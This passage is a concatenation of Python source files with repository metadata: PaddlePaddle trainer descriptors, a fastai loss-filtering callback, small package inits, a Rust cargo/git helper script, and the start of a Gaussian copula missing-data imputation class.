config.dest_var_list.append(i)
dependency_map = config_dict.get("dependency_map", {})
for key in dependency_map:
m = config.table_denpendency_map.add()
m.key = key
values = dependency_map[key]
if not isinstance(values, list):
values = [values]
if len(values) != 1:
raise ValueError("dependency len %s != 1" % len(values))
for value in values:
m.values.append(value)
config.dense_pull_after_copy = \
config_dict.get("dense_pull_after_copy", True)
config.enable_dependency = \
config_dict.get("enable_dependency", False)
config.sparse_copy_by_feasign = \
config_dict.get("sparse_copy_by_feasign", True)
def _desc(self):
from google.protobuf import text_format
return self.proto_desc.SerializeToString()
def __str__(self):
from google.protobuf import text_format
return text_format.MessageToString(self.proto_desc)
class MultiTrainer(TrainerDesc):
'''
Implement of MultiTrainer.
Can be init from TrainerDesc.
'''
def __init__(self):
super(MultiTrainer, self).__init__()
pass
def _set_program(self, program):
super(MultiTrainer, self)._set_program(program)
self._program = program
def _gen_trainer_desc(self):
super(MultiTrainer, self)._gen_trainer_desc()
self.proto_desc.class_name = "MultiTrainer"
self._device_worker._set_infer(self._infer)
self._device_worker._set_program(self._program)
self._device_worker._gen_worker_desc(self.proto_desc)
class DistMultiTrainer(TrainerDesc):
"""
Implement of DistMultiTrainer.
It's for Distributed training.
"""
def __init__(self):
super(DistMultiTrainer, self).__init__()
pass
def _set_program(self, program):
super(DistMultiTrainer, self)._set_program(program)
self._program = program
def _gen_trainer_desc(self):
super(DistMultiTrainer, self)._gen_trainer_desc()
self.proto_desc.class_name = "DistMultiTrainer"
if self._program == None:
raise RuntimeError("None Program")
self._device_worker._set_infer(self._infer)
self._device_worker._set_program(self._program)
self._device_worker._gen_worker_desc(self.proto_desc)
class PipelineTrainer(TrainerDesc):
"""
Implement of PipelineTrainer.
It's for Pipeline.
"""
def __init__(self):
super(PipelineTrainer, self).__init__()
pass
def _set_program(self, program):
super(PipelineTrainer, self)._set_program(program)
self._program = program
def _gen_trainer_desc(self):
super(PipelineTrainer, self)._gen_trainer_desc()
self.proto_desc.class_name = "PipelineTrainer"
if self._program == None:
raise RuntimeError("None Program")
self._device_worker._set_infer(self._infer)
self._device_worker._set_program(self._program)
self._device_worker._gen_worker_desc(self.proto_desc)
| 36.508834 | 80 | 0.662698 |
4a27ea4b044e7fdd3deef98f9bec5b156c57f587 | 3,587 | py | Python | fastai_extensions/exp/nb_BatchLossFilter.py | leoitcode/bugslife | bc2af0816bc37320a5125f9d901e98503d24b6fe | [
"MIT"
] | 1 | 2020-01-25T19:03:17.000Z | 2020-01-25T19:03:17.000Z | fastai_extensions/exp/nb_BatchLossFilter.py | leoitcode/bugslife | bc2af0816bc37320a5125f9d901e98503d24b6fe | [
"MIT"
] | 8 | 2020-03-07T02:35:28.000Z | 2022-03-12T00:13:16.000Z | fastai_extensions/exp/nb_BatchLossFilter.py | leoitcode/bugslife | bc2af0816bc37320a5125f9d901e98503d24b6fe | [
"MIT"
] | null | null | null | #AUTOGENERATED! DO NOT EDIT! file to edit: ./BatchLossFilter.ipynb (unless otherwise specified)
import torch
import numpy as np
from fastai.basic_train import *
import functools
from functools import partial
import warnings
warnings.filterwarnings("ignore", category=UserWarning, module="torch.nn.functional")
from IPython.display import display, HTML
display(HTML("<style>.container { width:100% !important; }</style>"))
import math
from fastai.torch_core import add_metrics
class BatchLossFilterCallback(LearnerCallback):
_order = -20
def __init__(self, learn:Learner, min_sample_perc:float=0., min_loss_perc:float=0.):
super().__init__(learn)
assert min_sample_perc >0. or min_loss_perc > 0., 'min_sample_perc <= 0 and min_loss_perc <= 0'
self.min_sample_perc, self.min_loss_perc = min_sample_perc, min_loss_perc
self.learn = learn
self.model = learn.model
self.crit = learn.loss_func
if hasattr(self.crit, 'reduction'): self.red = self.crit.reduction
self.sel_losses_sum, self.losses_sum = 0., 0.
self.sel_samples, self.samples = 0., 0.
self.recorder.add_metric_names(["loss_perc", "samp_perc"])
def on_epoch_begin(self, **kwargs):
"Set the inner value to 0."
self.sel_losses_sum, self.losses_sum = 0., 0.
self.sel_samples, self.samples = 0., 0.
def on_batch_begin(self, last_input, last_target, train, epoch, **kwargs):
if not train or epoch == 0: return
if hasattr(self.crit, 'reduction'): setattr(self.crit, 'reduction', 'none')
with torch.no_grad(): self.losses = np.array(self.crit(self.model(last_input), last_target).cpu())
if hasattr(self.crit, 'reduction'): setattr(self.crit, 'reduction', self.red)
self.get_loss_idxs()
self.sel_losses_sum += self.losses[self.idxs].sum()
self.losses_sum += self.losses.sum()
self.sel_samples += len(self.idxs)
self.samples += len(self.losses)
return {"last_input": last_input[self.idxs], "last_target": last_target[self.idxs]}
def on_epoch_end(self, epoch, last_metrics, **kwargs):
loss_perc = self.sel_losses_sum / self.losses_sum if epoch > 0 else 1.
sample_perc = self.sel_samples / self.samples if epoch > 0 else 1.
return add_metrics(last_metrics, [loss_perc, sample_perc])
def on_train_end(self, **kwargs):
"""At the end of training this calleback will be removed"""
if hasattr(self.learn.loss_func, 'reduction'): setattr(self.learn.loss_func, 'reduction', self.red)
drop_cb_fn(self.learn, 'BatchLossFilterCallback')
def get_loss_idxs(self):
idxs = np.argsort(self.losses)[::-1]
sample_max = math.ceil(len(idxs) * self.min_sample_perc)
self.losses /= self.losses.sum()
loss_max = np.argmax(self.losses[idxs].cumsum() >= self.min_loss_perc) + 1
self.idxs = list(idxs[:max(sample_max, loss_max)])
def drop_cb_fn(learn, cb_name:str)->None:
cbs = []
for cb in learn.callback_fns:
if isinstance(cb, functools.partial): cbn = cb.func.__name__
else: cbn = cb.__name__
if cbn != cb_name: cbs.append(cb)
learn.callback_fns = cbs
Learner.drop_cb_fn = drop_cb_fn
def batch_loss_filter(learn:Learner, min_sample_perc:float=0., min_loss_perc:float=.9)->Learner:
learn.callback_fns.append(partial(BatchLossFilterCallback, min_sample_perc=min_sample_perc,
min_loss_perc=min_loss_perc))
return learn
Learner.batch_loss_filter = batch_loss_filter | 43.216867 | 108 | 0.684974 |
4a27ea920e7dc49afdce00257497b306e2048fa2 | 196 | py | Python | als_to_midi/__init__.py | kovaacs/als_to_midi | 116b7a5a55f140b2a5e18402a188bc74e7bd5748 | [
"MIT"
] | null | null | null | als_to_midi/__init__.py | kovaacs/als_to_midi | 116b7a5a55f140b2a5e18402a188bc74e7bd5748 | [
"MIT"
] | null | null | null | als_to_midi/__init__.py | kovaacs/als_to_midi | 116b7a5a55f140b2a5e18402a188bc74e7bd5748 | [
"MIT"
] | null | null | null | import datetime
__author__ = "Marcell Kovacs"
__author_email__ = "[email protected]"
__version__ = datetime.datetime.now().strftime('%y.%m.%d')
__description__ = "Extract MIDI from ALS files"
| 28 | 58 | 0.765306 |
4a27ead303274a96e3eaa26d288cf1540cca3654 | 647 | py | Python | FitLib/FunctionsLibrary/General.py | skelton-group/FitLib | 84481cbcdae2bf0575e162717866b4035187d57a | [
"MIT"
] | null | null | null | FitLib/FunctionsLibrary/General.py | skelton-group/FitLib | 84481cbcdae2bf0575e162717866b4035187d57a | [
"MIT"
] | null | null | null | FitLib/FunctionsLibrary/General.py | skelton-group/FitLib | 84481cbcdae2bf0575e162717866b4035187d57a | [
"MIT"
] | null | null | null | # FitLib/FunctionsLibrary/General.py
# ----------------
# Module Docstring
# ----------------
""" Common functions for fitting. """
# -------
# Imports
# -------
import numpy as np
from FitLib.Function import CreateFunction
# ---------
# Functions
# ---------
def Polynomial(x, *p):
""" General polynomial function y = p[0] * x ^ N + p[1] * x ^ (N - 1) + ... + p[N] """
return np.polyval(p, x)
def CreatePolynomial(p, p_fit = None, p_bounds = None):
""" Return a Function object representing a Polynomial function. """
return CreateFunction(
Polynomial, p, p_fit = p_fit, p_bounds = p_bounds
)
| 18.485714 | 90 | 0.554869 |
4a27ebfcf5f3aca1418e7c2109e3a2f6315a7078 | 2,761 | py | Python | raytracer/raytracer.py | codacy-badger/RayTracer | 64da4c0dce238ee07488966c4103f863a38e411f | [
"MIT"
] | null | null | null | raytracer/raytracer.py | codacy-badger/RayTracer | 64da4c0dce238ee07488966c4103f863a38e411f | [
"MIT"
] | null | null | null | raytracer/raytracer.py | codacy-badger/RayTracer | 64da4c0dce238ee07488966c4103f863a38e411f | [
"MIT"
] | null | null | null | #!/usr/local/bin/python3
import subprocess as sp
import sys, os
from typing import Dict
from distutils.dir_util import copy_tree
def commit(cwd: str, cargo: Dict[str, str]):
gitworkflow = [
["git", "add", "-u"],
["git", "commit", "-m", sys.argv[2]],
["git", "pull", "--rebase"],
["git", "push"]
]
package_name = cargo["package"]["name"]
doc_dir = f"{cwd}/target/doc"
doc_dest_dir = f"{cwd}/docs"
print("Formatting code!")
fmt = sp.check_output(["cargo", "fmt"])
print("Generating docs!")
docs = sp.check_output(["cargo", "doc", "--no-deps", "--document-private-items"])
copy_tree(doc_dir, doc_dest_dir, update=1)
bench = sp.check_output(["cargo", "bench"])
try:
print("Linting code!")
lint = sp.check_output(["cargo", "clippy", "--all-features", "--", "-D", "warnings"])
print("Testing code!")
test = sp.check_output(["cargo", "test"])
except sp.CalledProcessError:
print("Failed!")
else:
print("Commiting changes!")
for cmd in gitworkflow:
sp.call(cmd)
def debug(cwd: str, cargo: Dict[str, str]):
sp.call(["cargo", "run"] + sys.argv[2:])
def run(cwd: str, cargo: Dict[str, str]):
sp.call(["cargo", "run", "--release"] + sys.argv[2:])
def test(cwd: str, cargo: Dict[str, str]):
sp.call(["cargo", "test"] + sys.argv[2:])
def fmt(cwd: str, cargo: Dict[str, str]):
sp.call(["cargo", "fmt"] + sys.argv[2:])
def lint(cwd: str, cargo: Dict[str, str]):
sp.call(["cargo", "clippy"] + sys.argv[2:])
def doc(cwd: str, cargo: Dict[str, str]):
sp.call(["cargo", "doc"] + sys.argv[2:])
def bench(cwd: str, cargo:Dict[str, str]):
sp.call(["cargo", "bench"] + sys.argv[2:])
if __name__ == "__main__":
dispatch = {
"commit": commit,
"debug": debug,
"run": run,
"test": test,
"fmt": fmt,
"lint": lint,
"doc": doc,
"bench": bench
}
cwd = os.getcwd()
if not os.path.exists(f"{cwd}/Cargo.toml"):
print("Not inside a crate!")
else:
with open(f"{cwd}/Cargo.toml", 'r') as f:
cargo_lines = filter(lambda s: s != "", map(lambda x: x.strip("\n").strip(), f.readlines()))
cargo = {}
sublevel = None
for l in cargo_lines:
if l[0] == "[":
sublevel = l[1:-1]
cargo[sublevel] = {}
elif sublevel is not None:
split = list(map(lambda x: x.strip(), l.split("=")))
cargo[sublevel][split[0]] = split[1].replace('"', '')
if sys.argv[1] in dispatch.keys():
dispatch[sys.argv[1]](cwd, cargo)
else:
print("No valid arguments supplied!")
| 31.375 | 104 | 0.531329 |
4a27ec34c19265d6d39bda91634bd43e4fa16a80 | 903 | py | Python | portscanner.py | kamalkum9r/python | 04409d6bc531fe102d1006f3a6033c1a44fac539 | [
"MIT"
] | 1 | 2021-07-17T07:30:30.000Z | 2021-07-17T07:30:30.000Z | portscanner.py | kamalkum9r/python | 04409d6bc531fe102d1006f3a6033c1a44fac539 | [
"MIT"
] | null | null | null | portscanner.py | kamalkum9r/python | 04409d6bc531fe102d1006f3a6033c1a44fac539 | [
"MIT"
] | null | null | null | # port scanner
# please dont use it for wrong purposes
import sys
import socket
print("PORT SCANNER")
if len(sys.argv) == 2:
target = socket.gethostbyname(sys.argv[1])
else:
print("Invalid ammount of Argument you must enter the IP")
print("Scanning Port: " + target)
try:
for port in range(1,100):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(0.9)
result = s.connect_ex((target,port))
if result ==0:
print("Port {} is open".format(port))
s.close()
except KeyboardInterrupt:
print("\n Exitting Program !!!!")
sys.exit()
except socket.gaierror:
print("\n Hostname Could Not Be Resolved !!!!")
sys.exit()
except socket.error:
print("\ Server not responding !!!!")
sys.exit()
# my instagram username: kamalkum9r | 25.8 | 63 | 0.599114 |
4a27ecbc424bd285fce09aaefd441513f3613f1a | 1,084 | py | Python | kubernetes/test/test_v1beta1_custom_resource_definition.py | reymont/python | 02a3a31c630c305527b328af49724f348fbdae15 | [
"Apache-2.0"
] | 1 | 2018-10-20T19:37:57.000Z | 2018-10-20T19:37:57.000Z | kubernetes/test/test_v1beta1_custom_resource_definition.py | reymont/python | 02a3a31c630c305527b328af49724f348fbdae15 | [
"Apache-2.0"
] | null | null | null | kubernetes/test/test_v1beta1_custom_resource_definition.py | reymont/python | 02a3a31c630c305527b328af49724f348fbdae15 | [
"Apache-2.0"
] | 2 | 2018-07-27T19:39:34.000Z | 2020-12-25T02:48:27.000Z | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.11.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.models.v1beta1_custom_resource_definition import V1beta1CustomResourceDefinition
class TestV1beta1CustomResourceDefinition(unittest.TestCase):
""" V1beta1CustomResourceDefinition unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testV1beta1CustomResourceDefinition(self):
"""
Test V1beta1CustomResourceDefinition
"""
# FIXME: construct object with mandatory attributes with example values
#model = kubernetes.client.models.v1beta1_custom_resource_definition.V1beta1CustomResourceDefinition()
pass
if __name__ == '__main__':
unittest.main()
| 24.088889 | 110 | 0.741697 |
4a27ee948763d760f453b3f9591ab291b6b0c303 | 213 | py | Python | simple_peewee_flask_webapi/__init__.py | prbpedro/simple_peewee_flask_webapi | 9f70e2cf034d2ff53b6c730f1362e03a37cc9a59 | [
"MIT"
] | null | null | null | simple_peewee_flask_webapi/__init__.py | prbpedro/simple_peewee_flask_webapi | 9f70e2cf034d2ff53b6c730f1362e03a37cc9a59 | [
"MIT"
] | null | null | null | simple_peewee_flask_webapi/__init__.py | prbpedro/simple_peewee_flask_webapi | 9f70e2cf034d2ff53b6c730f1362e03a37cc9a59 | [
"MIT"
] | null | null | null | from simple_peewee_flask_webapi import app_models
from simple_peewee_flask_webapi import simple_table
from simple_peewee_flask_webapi import join_table
from simple_peewee_flask_webapi import application_start
| 42.6 | 57 | 0.906103 |
4a27ef9d66933e1a6c4f915d65f557b6a516bb5c | 2,369 | py | Python | nonebot_plugin_nokia/nokia.py | kexue-z/nonebot-plugin-nokia | c47a5fb79ff1626cc5cddc8e9809f8772c020dad | [
"MIT"
] | 3 | 2021-11-30T10:18:59.000Z | 2022-01-20T07:15:24.000Z | nonebot_plugin_nokia/nokia.py | kexue-z/nonebot-plugin-nokia | c47a5fb79ff1626cc5cddc8e9809f8772c020dad | [
"MIT"
] | null | null | null | nonebot_plugin_nokia/nokia.py | kexue-z/nonebot-plugin-nokia | c47a5fb79ff1626cc5cddc8e9809f8772c020dad | [
"MIT"
] | null | null | null | import base64
from io import BytesIO
from os.path import dirname
from typing import Tuple
from collections import deque
from PIL import Image, ImageFont, ImageDraw, ImageOps
font_size = 70
line_gap = 20
body_pos = (205, 340)
subtitle_pos = (790, 320)
body_color = (0, 0, 0, 255)
subtitle_color = (129, 212, 250, 255)
line_rotate = -9.8
max_line_width = 680
max_content_height = 450
print(dirname(__file__) + "/res/font.ttc")
font = ImageFont.truetype(dirname(__file__) + "/res/font.ttf", font_size)
def image_to_byte_array(image: Image):
imgByteArr = io.BytesIO()
image.save(imgByteArr, format=image.format)
imgByteArr = imgByteArr.getvalue()
return imgByteArr
def im_2_b64(pic: Image.Image) -> str:
buf = BytesIO()
pic.save(buf, format="PNG")
base64_str = base64.b64encode(buf.getbuffer()).decode()
return "base64://" + base64_str
def draw_subtitle(im, text: str):
width, height = font.getsize(text)
image2 = Image.new("RGBA", (width, height))
draw2 = ImageDraw.Draw(image2)
draw2.text((0, 0), text=text, font=font, fill=subtitle_color)
image2 = image2.rotate(line_rotate, expand=1)
px, py = subtitle_pos
sx, sy = image2.size
im.paste(image2, (px, py, px + sx, py + sy), image2)
def generate_image(text: str):
origin_im = Image.open(dirname(__file__) + "/res/img.png")
text = text[:900]
length = len(text)
width, height = font.getsize(text)
current_width = 0
lines = []
line = ""
q = deque(text)
while q:
word = q.popleft()
width, _ = font.getsize(word)
current_width += width
if current_width >= max_line_width:
q.appendleft(word)
lines.append(line)
current_width = 0
line = ""
else:
line += word
lines.append(line)
image2 = Image.new("RGBA", (max_line_width, max_content_height))
draw2 = ImageDraw.Draw(image2)
for i, line in enumerate(lines):
y = i * (height + line_gap)
if y > max_content_height:
break
draw2.text((0, y), text=line, font=font, fill=body_color)
image2 = image2.rotate(line_rotate, expand=1)
px, py = body_pos
sx, sy = image2.size
origin_im.paste(image2, (px, py, px + sx, py + sy), image2)
draw_subtitle(origin_im, f"{length}/900")
return im_2_b64(origin_im)
| 28.202381 | 73 | 0.641621 |
4a27efe66b599c8a8649f2e466aade421e5d6a40 | 72,330 | py | Python | gcimpute/gaussian_copula.py | udellgroup/gcimpute | b29650e61785af904a3bff753ffc2995449883cf | [
"MIT"
] | null | null | null | gcimpute/gaussian_copula.py | udellgroup/gcimpute | b29650e61785af904a3bff753ffc2995449883cf | [
"MIT"
] | null | null | null | gcimpute/gaussian_copula.py | udellgroup/gcimpute | b29650e61785af904a3bff753ffc2995449883cf | [
"MIT"
] | null | null | null | from .transform_function import TransformFunction
from .online_transform_function import OnlineTransformFunction
from .embody import _latent_operation_body_, get_truncnorm_moments_vec
from scipy.stats import norm, truncnorm
import numpy as np
import pandas as pd
from concurrent.futures import ProcessPoolExecutor
from scipy.linalg import svdvals
from collections import defaultdict
import warnings
var_type_names = ['continuous', 'ordinal', 'lower_truncated', 'upper_truncated', 'twosided_truncated']
class GaussianCopula():
'''
Gaussian copula model.
This class allows to estimate the parameters of a Gaussian copula model from incomplete data,
and impute the missing entries using the learned model.
Parameters
----------
training_mode: {'standard', 'minibatch-offline', 'minibatch-online'}, default='standard'
String describing the type of training to use. Must be one of:
'standard'
all data are used to estimate the marginals and update the model in each iteration
'minibatch-offline'
all data are used to estimate the marginals, but only a mini-batch's data are used to update the model in each iteration
'minibatch-online'
only recent data are used to estimate the marginals, and only a mini-batch's data are used to update the model in each iteration
tol: float, default=0.01
The convergence threshold. EM iterations will stop when the parameter update ratio is below this threshold.
max_iter: int, default=50
The number of EM iterations to perform.
random_state: int, default=101
Controls the randomness in generating latent ordinal values. Not used if there is no ordinal variable.
n_jobs: int, default=1
The number of jobs to run in parallel.
verbose: int, default=0
Controls the verbosity when fitting and predicting.
0 : silence
1 : information
2 : rich information
3 : debugging
num_ord_updates: int, default=1
Number of steps to take when approximating the mean and variance of the latent variables corresponding to ordinal dimensions.
We do not recommend using value larger than 1 (the default value) at this moment. It will slow the speed without clear
performance improvement.
min_ord_ratio: float, default=0.1
Used for automatic variable type decision. The largest mode frequency for continuous variables.
stepsize_func: a function that takes 1-dim input and return 1-dim output
Only used when (1) training_mode = 'minibatch-offline'; (2) training_mode = 'minibatch-online' and 'const_stepsize=None'.
The supplied function should outputs monotonically decreasing values in the range (0,1) on positive integers
const_stepsize: float in the range (0,1) or None, default is 0.5.
Only used when training_mode = 'minibatch-online'.
num_pass: int or None, default = 2
Only used when training_mode='minibatch-offline'. Used to set max_iter.
batch_size: int, default=100
The number of data points in each mini-batch.
window_size: int, default=200
The lookback window length for online marginal estimate. Only used when training_mode = 'minibatch-online'.
decay: int or None, default=None
The decay rate to be allocated to observations for online imputation. Only used when training_mode = 'minibatch-online'.
realtime_marginal: bool, default=True
Only used when training_mode = 'minibatch-online'.
If set to True, the marginal updates after every row; otherwise, the marginal updates after every batch_size rows.
In comparison, correlation update is conducted after every batch_size rows.
The model runs longer but gives more accurate estimation when set to True.
corr_diff_type: A list with elements from {'F', 'S', 'N'}, default = ['F']
The matrix norm used to compute copula correlation update ratio. Used for detecting change points when training mode = 'minibatch-online'.
Must be one of:
'F'
Frobenius norm
'S'
Spectral norm
'N'
Nuclear norm
Attributes
----------
n_iter_: int
The number of EM iterations conducted.
likelihood: ndarray of shape (n_iter_,)
The model likelihood value at each iteration.
feature_names: ndarray of shape (n_features,)
Number of features seen during `fit`.
Methods
-------
fit(X)
Fit a Gaussian copula model on X.
transform(X)
Return the imputed X using the stored model.
fit_transform(X)
Fit a Gaussian copula model on X and return the transformed X.
fit_transform_evaluate(X, eval_func)
Conduct eval_func on the imputed datasets returned after each iteration.
sample_imputation(X)
Return multiple imputed datasets X using the stored model.
get_params()
Get parameters for this estimator.
get_vartypes()
Get the specified variable types used in model fitting.
get_imputed_confidence_interval()
Get the confidence intervals for the imputed missing entries.
get_reliability()
Get the reliability, a relative quantity across all imputed entries, when either all variables are continuous or all variables are ordinal
fit_change_point_test()
Conduct change point test after receiving each data batch.
'''
def __init__(self, training_mode='standard', tol=0.01, max_iter=50, random_state=101, n_jobs=1, verbose=0, num_ord_updates=1, min_ord_ratio=0.1, stepsize_func=lambda k, c=5:c/(k+c), const_stepsize=0.5, num_pass=2, batch_size=100, window_size=200, decay=None, realtime_marginal=True, corr_diff_type=['F']):
def check_stepsize():
L = np.array([stepsize_func(x) for x in range(1, max_iter+1, 1)])
if L.min() <=0 or L.max()>=1:
print(f'Step size should be in the range of (0,1). The input stepsize function yields step size from {L.min()} to {L.max()}')
raise
if not all(x>y for x, y in zip(L, L[1:])):
print(f'Input step size is not monotonically decreasing.')
raise
if training_mode == 'minibatch-online':
if const_stepsize is None:
check_stepsize()
self.stepsize = stepsize_func
else:
assert 0<const_stepsize<1, 'const_stepsize must be in the range (0, 1)'
self.stepsize = lambda x, c=const_stepsize: c
elif training_mode == 'minibatch-offline':
check_stepsize()
self.stepsize = stepsize_func
elif training_mode == 'standard':
pass
else:
print("Invalida training_mode, must be one of 'standard', 'minibatch-offline', 'minibatch-online'")
raise
self._training_mode = training_mode
self._batch_size = batch_size
self._window_size = window_size
self._realtime_marginal = realtime_marginal
self._decay = decay
self._corr_diff_type = corr_diff_type
# self._cont_indices and self._ord_indices store boolean indexing
self._cont_indices = None
self._ord_indices = None
# self.cont_indices and self.ord_indices store integer indexing
self.cont_indices = None
self.ord_indices = None
self._min_ord_ratio = min_ord_ratio
self.var_type_dict = {}
self._seed = random_state
self._rng = np.random.default_rng(self._seed)
self._sample_seed = self._seed
self._threshold = tol
self._max_iter = max_iter
self._max_workers = n_jobs
self._verbose = verbose
self._num_ord_updates = num_ord_updates
self._num_pass = num_pass
self._iter = 0
# model parameter
self._corr = None
# attributes
self.n_iter_ = 0
self.likelihood = []
self.features_names = None
self.corrupdate = []
self.corr_diff = defaultdict(list)
################################################
#### public functions
################################################
def fit(self, X,
continuous = None,
ordinal = None,
lower_truncated= None,
upper_truncated = None,
twosided_truncated = None,
**kwargs):
'''
Fits the Gaussian copula imputer on the input data X.
Parameters
----------
X: array-like of shape (n_samples, n_features)
Input data
continous, ordinal, lower_truncated, upper_truncated, twosided_truncated, poisson: list of integers
list of the corresponding variable type indices
kwargs:
additional keyword arguments for fit_offline:
first_fit: bool, default=True
If true, initialize the copula correlation matrix
max_iter: int or None.
The used maximum number of iterations is self._max_iter if max_iter is None else max_iter
convergence_verbose: bool, default = True
Output convergence information if True
'''
self.store_var_type(continuous = continuous,
ordinal = ordinal,
lower_truncated = lower_truncated,
upper_truncated = upper_truncated,
twosided_truncated = twosided_truncated
)
if self._training_mode == 'minibatch-online':
print('fit method is not implemented for minibatch-online mode, since the fitting and imputation are done in the unit of mini-batch. To impute the missing entries, call fit_transform.')
raise
else:
self.fit_offline(X, **kwargs)
def transform(self, X=None, num_ord_updates=2):
'''
Impute the missing entries in X using currently fitted model (accessed through self._corr).
Parameters
----------
X: array-like of shape (n_samples, n_features) or None
Data to be imputed. If None, set X as the data used to fit the model.
num_ord_updates: int, default=2
Number of steps to take when approximating the mean and variance of the latent variables corresponding to ordinal dimensions.
Returns
-------
X_imp: array-like of shape (n_samples, n_features)
Tne imputed complete dataset
'''
# get Z
if X is None:
Z = self._latent_Zimp
else:
Z, Z_ord_lower, Z_ord_upper = self._observed_to_latent(X_to_transform=X)
Z, _ = self._fillup_latent(Z=Z, Z_ord_lower=Z_ord_lower, Z_ord_upper=Z_ord_upper, num_ord_updates=num_ord_updates)
# from Z to X
X_imp = self._latent_to_imp(Z=Z, X_to_impute=X)
return X_imp
def fit_transform(self, X,
continuous = None,
ordinal = None,
lower_truncated= None,
upper_truncated = None,
twosided_truncated = None,
**kwargs
):
'''
Fit to data, then transform it.
For 'minibatch-online' mode, the variable types are set in this function call since the fit and transformation are done in an alternative fashion.
For the other two modes, the variable types are set in the function fit_offline.
Parameters
----------
X: array-like of shape (n_samples, n_features)
Input data
continous, ordinal, lower_truncated, upper_truncated, twosided_truncated, poisson: list of integers
list of the corresponding variable type indices
kwargs:
additional keyword arguments for fit_transform_online and fit_offline
Keyword arguments of fit_transform_online:
X_true: array-like of shape (n_samples, n_features) or None
If not None, it indicates that some (could be all) of the missing entries of X_batch are revealed,
and stored in X_true, after the imputation of X_batch. Those observation entries will be used to
update the model.
n_trian: int, default=0
The number of rows to be used to initialize the model estimation.
Use self._batch_size if n_train is 0
For keyword arguments of fit_offline, see Parameters of fit()
Returns
-------
X_imp: array-like of shape (n_samples, n_features)
Tne imputed complete dataset
'''
self.store_var_type(continuous = continuous,
ordinal = ordinal,
lower_truncated = lower_truncated,
upper_truncated = upper_truncated,
twosided_truncated = twosided_truncated
)
if self._training_mode == 'minibatch-online':
X = self._preprocess_data(X, set_indices=False)
if 'X_true' in kwargs:
self.set_indices(np.asarray(kwargs['X_true']))
else:
self.set_indices(X)
kwargs_online = {name:kwargs[name] for name in ['n_train', 'X_true'] if name in kwargs}
X_imp = self.fit_transform_online(X, **kwargs_online)
else:
X = self._preprocess_data(X)
kwargs_offline = {name:kwargs[name] for name in ['first_fit', 'max_iter', 'convergence_verbose'] if name in kwargs}
X_imp = self.fit_transform_offline(X, **kwargs_offline)
return X_imp
def fit_transform_evaluate(self, X, eval_func=None, num_iter=30, return_Ximp=False, **kwargs):
'''
Run the algorithm for num_iter iterations and evaluate the returned imputed sample at each iteration.
Parameters
----------
X: array-like of shape (n_samples, n_features)
Data to be imputed.
eval_func: function that takes array-like of shape (n_samples, n_features) input
If not None, apply eval_func to the imputed dataset after each iteration and return the results.
num_iter: int, default = 30
The number of iterations to run.
return_Ximp: bool, default = False
If True, return the imputed datasets after each iteration.
kwargs:
additional keyword arguments for fit_transform_online and fit_offline
See Parameters of fit_transform()
Returns
-------
out: dict
'X_imp': the imputed datasets
'evluation': the desired evaluation on imputed datasets
'''
out = defaultdict(list)
# first fit
Ximp = self.fit_transform(X = X, max_iter = 1, convergence_verbose = False, **kwargs)
if eval_func is not None:
out['evaluation'].append(eval_func(Ximp))
if return_Ximp:
out['X_imp'].append(Ximp)
# subsequent fits
for i in range(1, num_iter, 1):
Ximp = self.fit_transform(X = X, max_iter = 1, first_fit = False, convergence_verbose = False)
if eval_func is not None:
out['evaluation'].append(eval_func(Ximp))
if return_Ximp:
out['X_imp'].append(Ximp)
return out
def get_params(self):
'''
Get parameters for this estimator.
Returns:
params: dict
'''
params = {'copula_corr': self._corr.copy()}
return params
def get_vartypes(self, feature_names=None):
'''
Return the variable types used during the model fitting. Each variable is one of the following:
'continuous', 'ordinal', 'lower_truncated', 'upper_truncated', 'twosided_truncated'
Parameters
----------
feature_names: list of str or None
If not None, feature_names will be used to name variables
Returns
-------
_var_types: dict
Keys: 'continuous', 'ordinal', 'lower_truncated', 'upper_truncated', 'twosided_truncated'
'''
_var_types = self.var_type_dict.copy()
if feature_names is not None:
names = list(feature_names)
for key,value in _var_types.items():
_var_types[key] = [names[i] for i in value]
for name in var_type_names:
if name not in _var_types:
_var_types[name] = []
return _var_types
def get_imputed_confidence_interval(self, X=None, alpha = 0.95, num_ord_updates=2, type='analytical', **kwargs):
'''
Compute the confidence interval for each imputed entry.
Parameters
----------
X: array-like of shape (n_samples, n_features) or None
Data to be imputed. If None, set X as the data used to fit the model.
alpha: float in (0,1), default = 0.95
The desired significance level.
num_ord_updates: int, default = 2
Number of steps to take when approximating the mean and variance of the latent variables corresponding to ordinal dimensions.
type: {'anlaytical', 'quantile'}, default ='analytical'.
'analytical': derive the analytical confidence interval
'qunatile': first do multiple imputation and then derive empirical quantile confidence intervals
kwargs:
additional keyword arguments for get_imputed_confidence_interval_quantiles
Returns
-------
out: dict with keys
'upper': array-like of shape (n_samples, n_features)
The upper bound of the confidence interval
'lower': array-like of shape (n_samples, n_features)
The lower bound of the confidence interval
'''
if self._training_mode == 'minibatch-online':
raise NotImplementedError('Confidence interval has not yet been supported for minibatch-online mode')
if type == 'quantile':
return self.get_imputed_confidence_interval_quantile(X=X, alpha=alpha, num_ord_updates=num_ord_updates, **kwargs)
if X is None:
Zimp = self._latent_Zimp
Cord = self._latent_Cord
X = self.transform_function.X
else:
Z, Z_ord_lower, Z_ord_upper = self._observed_to_latent(X_to_transform=X)
Zimp, Cord = self._fillup_latent(Z=Z, Z_ord_lower=Z_ord_lower, Z_ord_upper=Z_ord_upper, num_ord_updates=num_ord_updates)
n, p = Zimp.shape
margin = norm.ppf(1-(1-alpha)/2)
# upper and lower have np.nan at oberved locations because std_cond has np.nan at those locations
std_cond = self._get_cond_std_missing(X=X, Cord=Cord)
upper = Zimp + margin * std_cond
lower = Zimp - margin * std_cond
# monotonic transformation
upper = self._latent_to_imp(Z=upper, X_to_impute=X)
lower = self._latent_to_imp(Z=lower, X_to_impute=X)
obs_loc = ~np.isnan(X)
upper[obs_loc] = np.nan
lower[obs_loc] = np.nan
out = {'upper':upper, 'lower':lower}
return out
def sample_imputation(self, X=None, num=5, num_ord_updates=1):
'''
Sample multiple imputed datasets using the currently fitted method.
Parameters
----------
X: array of shape (n_samples, n_features) or None.
The dataset to be imputed. Use the seen data for model fitting if None.
num: int, default=5
The number of imputation samples to draw.
num_ord_updates: int, default=1
